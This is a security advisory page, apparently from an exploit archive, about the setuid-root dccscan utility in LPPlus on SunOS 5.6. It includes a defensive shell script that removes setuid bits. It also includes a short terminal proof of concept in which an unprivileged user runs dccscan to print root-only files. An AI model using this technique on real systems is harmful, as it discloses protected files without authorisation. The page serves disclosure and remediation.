vendor: SunOS 5.6
by: SecurityFocus
CVSS: 7.2 HIGH
Privilege Escalation
CWE: 264
Product Name: SunOS 5.6
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unix
2002

$LPHOME/bin/dccscan SUID-Root Vulnerability

$LPHOME/bin/dccscan is suid-root and can be executed by any user. It is possible for an unprivileged user to print files to which he does not have read access. In testing, this works even for printers to which the user is not given any access in the LPPlus security configuration.

Mitigation:

Ensure that $LPHOME/bin/dccscan is not set suid-root.
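
One way to apply this mitigation, as an added example that is not part of the original advisory: POSIX shell functions that list setuid files executable by any user under $LPHOME/bin and clear the setuid bit. The function names are hypothetical, and the page does not say whether dccscan still works for non-root users once the bit is removed.

```shell
#!/bin/sh
# Added example: audit and fix setuid files under $LPHOME/bin.
# Function names are hypothetical, not part of LPPlus.

# Print regular files in directory $1, owned by user $2 (default root),
# that are setuid (4000) and executable by "other" (0001): the
# combination the advisory describes for dccscan.
audit_setuid() {
    find "$1" -type f -user "${2:-root}" -perm -4001 -print
}

# Clear the setuid bit on file $1; succeed only if it is really gone.
strip_setuid() {
    chmod u-s "$1" || return 1
    [ ! -u "$1" ]
}

# Clear the bit on every finding in directory $1 (owner $2, default root),
# then re-audit. Returns 0 only when no finding remains.
remediate_dir() {
    audit_setuid "$1" "${2:-root}" | while IFS= read -r f; do
        if strip_setuid "$f"; then
            echo "setuid removed: $f"
        else
            echo "could not fix: $f" >&2
        fi
    done
    [ -z "$(audit_setuid "$1" "${2:-root}")" ]
}

# Report only (no changes) when LPHOME points at an installation.
if [ -n "${LPHOME:-}" ] && [ -d "$LPHOME/bin" ]; then
    audit_setuid "$LPHOME/bin"
fi
```

The top-level call only reports; run `remediate_dir "$LPHOME/bin"` as root to apply the change.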

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1644/info

$LPHOME/bin/dccscan is suid-root and can be executed by any user. It is possible for an unprivileged user to print files to which he does not have read access. In testing, this works even for printers to which the user is not given any access in the LPPlus security configuration.

# id
uid=0(root) gid=1(other)
# ls -alt /root/test
total 6
drwx------ 2 root other 512 Sep 5 17:46 .
-r-------- 1 root other 365 Sep 5 17:46 foo
drwx------ 3 root other 512 Sep 5 17:46 ..
# su - test
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
$ id
uid=600(test) gid=300(users)
$ ls -alt /root/test
/root/test: Permission denied
$ dccscan /root/test 30 5 "-dlp0"
$

# now, go to the printer and wait for the files to come out, or watch them 
# being queued as root, if you have access to dccstat